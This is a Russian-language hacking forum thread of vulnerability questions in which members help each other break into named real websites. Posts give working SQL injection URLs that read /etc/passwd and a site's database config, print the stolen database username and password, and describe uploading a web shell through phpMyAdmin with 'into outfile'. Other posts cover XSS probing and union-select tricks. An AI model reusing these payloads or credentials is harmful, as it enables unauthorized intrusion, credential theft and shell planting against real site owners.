Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    777DEMYAN777
    http://milw0rm.com/search.php набираешь datalife
     
    1 person likes this.
  2. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Спасибо ребятки!!!
     
  3. Demonboy

    Demonboy New Member

    Joined:
    28 Oct 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
     
  4. Demonboy

    Demonboy New Member

    Joined:
    28 Oct 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Какие например можеш что то посоветовать? А то я только начинающий....
     
  5. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    короче глянул на твой сайтик...
    http://www.mediaport.info/production.php?theme=-1'%20union%20select%201,2,3,4,5,LOAD_FILE('/'),7,8,9%20from%20mysql.user%20limit%200,1/*
    тебя наверное порадует...

    PS Если б не был таким ленивым, то сам бы покоырялся и тебе ничего не сказал :d
    //пасс мускулистого рута брутится
     
  6. Demonboy

    Demonboy New Member

    Joined:
    28 Oct 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пасиб большое мне ещё учиться и учиться сам бы до такого не дошел бы))
     
  7. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2F6574632F706173737764),6,7,8,9,10,11+from+users/*

    version():5.1.22-rc-log

    - можно ли както здесь залить шелл?
    - имея доступ на чтение файлов как можно узнать полный путь до www?
    - при использованиии конструкции into outfile можно ли кодировать путь к файлу в хекс?
     
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    1)Там есть phpmyadmin через него можно залить шелл
    читаем конфиг:
    Code:
    http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2f686f6d652f6b696e672f7075626c69635f68746d6c2f696e632f64625f6d7973716c2e696e63),6,7,8,9,10,11+from+mysql.user/*
    оттуда получаем логин/пароль к БД
    var $User = "clever";
    var $Password = "whitebear";
    Идем в phpmyadmin
    http://www.bis-el.kiev.ua/phpmyadm/
    и льем шелл через into outfile
    Путь: /home/king/public_html/
    2)Путь там можно подобрать, т.к там фряха, а в ней через load_file можно читать содержимое дир
    3)Путь к файлу в hex кодировать нельзя
     
    #3488 l-l00K, 2 Nov 2008
    Last edited: 2 Nov 2008
    3 people like this.
  9. NetSter

    NetSter Moderator

    Joined:
    30 Jul 2007
    Messages:
    810
    Likes Received:
    414
    Reputations:
    62
    сильно не пинайте если что не так) просто я только пробую искать xss
    при поисковом запросе фразы "><script>alert()</script> на одном сайте имеем следующую ошибку:
    на белом фоне красуется надпись
    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.

    ... почему спросил, просто много прошарил сайтов и только на этом впервые такая трабла.)
     
    _________________________
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Это IIS сервер скорее всего, он ругается на все неугодные ему символы
     
  11. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Там скорее всего mod_security стоит, в фильтры которого попадают передаваемые данные
     
    1 person likes this.
  12. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Кто подскажет это чтоза cms http://audiovkontakte.ru/

    И где её взять?
     
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    какая еще cms?
    там одна или пару страничек и самописный скрипт парсинга ссылок с вк.
    все
     
  14. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А где такой рарс нарыть???
     
  15. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    у Исиса купи
     
  16. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Помогите расковырять инъекцию:
    http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
     
    #3496 InFlame, 3 Nov 2008
    Last edited: 3 Nov 2008
  17. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вот тебе название таблиц

    http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables
    А дальше уже сам ковыряй её!
     
  18. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Вобщем такая ситуация:

    Есть сайт: http://www.xxx.com/news.php?type=16 (Выводит новость)

    При запросе: http://www.xxx.com/news.php?type=17-1 (Выводдит ту же самую новость)

    При запросе: http://www.xxx.com/news.php?type=17 (Выводдит "Новость не существует")
    -------------------------------------------------------------

    При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4,5/* (Выводдит "Новость не существует")

    При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4/* (Выводдит новость с id 16)

    При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)


    Вобщем нет никаких ошибок( хотя SQL Inj присутствует ... что делать в такой ситуации ?
     
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    попробуй склеить union select с:
    type=17'
    type=-1
    type=-1'
    type=9999
     
    2 people like this.
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Читать статьи про скуль. :D

    А что по твоему он должен выводить?
    http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
    Вот так попробуй
     
Thread Status:
Not open for further replies.